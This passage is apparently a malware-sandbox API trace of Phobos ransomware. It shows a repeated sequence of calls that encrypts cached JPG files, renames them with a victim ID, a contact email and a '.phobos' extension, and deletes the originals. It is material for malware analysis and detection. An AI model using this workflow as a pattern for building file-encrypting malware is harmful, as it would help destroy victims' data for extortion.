pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.248] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.248] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.248] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.248] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.248] CloseHandle (hObject=0x158) returned 1 [0176.248] CloseHandle (hObject=0x190) returned 1 [0176.249] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeg9qv[1].jpg")) returned 1 [0176.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.251] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2432) returned 1 [0176.251] CloseHandle (hObject=0x190) returned 1 [0176.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg")) returned 0x2020 [0176.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.251] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.251] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0176.252] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.252] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x980, lpOverlapped=0x0) returned 1 [0176.267] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x990, dwBufLen=0x990 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x990) returned 1 [0176.267] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x990, lpOverlapped=0x0) returned 1 [0176.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0176.270] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.270] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.270] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.270] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.270] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.270] CloseHandle (hObject=0x190) returned 1 [0176.270] CloseHandle (hObject=0x158) returned 1 [0176.270] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeggsl[1].jpg")) returned 1 [0176.278] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.284] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6745) returned 1 [0176.284] CloseHandle (hObject=0x190) returned 1 [0176.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg")) returned 0x2020 [0176.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.284] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.284] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.285] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.285] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1a59, lpOverlapped=0x0) returned 1 [0176.315] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a60, dwBufLen=0x1a60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a60) returned 1 [0176.315] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a60, lpOverlapped=0x0) returned 1 [0176.316] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.316] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.316] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.317] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.317] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.317] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.317] CloseHandle (hObject=0x190) returned 1 [0176.317] CloseHandle (hObject=0x17c) returned 1 [0176.317] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegjfz[1].jpg")) returned 1 [0176.318] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.319] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=17644) returned 1 [0176.319] CloseHandle (hObject=0x17c) returned 1 [0176.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg")) returned 0x2020 [0176.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.319] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.319] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.320] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.320] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x44ec, lpOverlapped=0x0) returned 1 [0176.327] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x44f0, dwBufLen=0x44f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x44f0) returned 1 [0176.327] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x44f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x44f0, lpOverlapped=0x0) returned 1 [0176.328] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.328] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.328] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.328] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.328] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.328] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.328] CloseHandle (hObject=0x17c) returned 1 [0176.329] CloseHandle (hObject=0x190) returned 1 [0176.329] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegsz3[1].jpg")) returned 1 [0176.330] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.331] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5915) returned 1 [0176.331] CloseHandle (hObject=0x190) returned 1 [0176.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg")) returned 0x2020 [0176.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.331] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.331] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.331] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.331] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.331] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x171b, lpOverlapped=0x0) returned 1 [0176.346] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1720, dwBufLen=0x1720 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1720) returned 1 [0176.346] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1720, lpOverlapped=0x0) returned 1 [0176.347] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.347] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.347] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.347] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.347] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.347] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.347] CloseHandle (hObject=0x190) returned 1 [0176.347] CloseHandle (hObject=0x17c) returned 1 [0176.347] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[1].jpg")) returned 1 [0176.348] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.349] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1509) returned 1 [0176.349] CloseHandle (hObject=0x17c) returned 1 [0176.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg")) returned 0x2020 [0176.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 